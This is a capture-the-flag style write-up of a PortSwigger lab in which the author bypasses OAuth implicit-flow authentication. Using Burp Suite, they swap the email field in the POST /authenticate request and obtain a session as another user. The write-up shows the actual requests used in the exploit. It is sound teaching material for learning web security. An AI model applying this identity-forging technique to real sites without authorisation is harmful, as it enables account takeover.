[This lab](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow) demonstrates how weak client-side validation in an OAuth **implicit flow** can be exploited to bypass authentication and log in as another user without their credentials.
---
#### 1. Understanding the Scenario
* **OAuth grant type**: Implicit flow (access token returned directly to the client without an authorization code exchange).
* **Vulnerability**: The client application trusts the user identity returned from the OAuth provider without verifying it against the actual authenticated account.
* **Goal**: Log in as `
[email protected]`.
---
#### 2. Reconnaissance – Mapping the OAuth Flow
Using Burp Suite, we:
1. Navigated to **My account** → **Login with social media**.
2. Completed the OAuth login with provided creds (`wiener:peter`).
3. Observed the sequence in **Proxy > HTTP history**:
* **Authorization request**
```
GET /auth?client_id=...&redirect_uri=...&response_type=token
```
This triggers the OAuth login screen on the social media service.
* **Redirect with access token**
```
HTTP/1.1 302 Found
Location: https://lab-url/#access_token=XYZ&token_type=Bearer&expires_in=3600
```
* **Client-side processing**
JavaScript extracts the `access_token` from the fragment and sends it to the blog application’s backend:
```
POST /authenticate HTTP/1.1
Host: lab-url
Content-Type: application/json
{
"email": "
[email protected]",
"access_token": "XYZ"
}
```
---
#### 3. Exploitation – Forging the Identity
The flaw: The blog server **does not verify** that the supplied `email` matches the user associated with the access token from the OAuth provider. It simply trusts the `email` field from the client request.
**Steps:**
1. Sent the `POST /authenticate` request to **Repeater**.
2. Modified:
```json
{
"email": "
[email protected]",
"access_token": "XYZ"
}
```
3. Sent the request — received `200 OK` with a `Set-Cookie` header (session cookie for Carlos).
4. Right-clicked → **Request in browser > In original session**.
5. Opened the generated URL — logged in as Carlos.
It may be better for you to just intercept it.
![[CleanShot 2025-08-15 at
[email protected]]]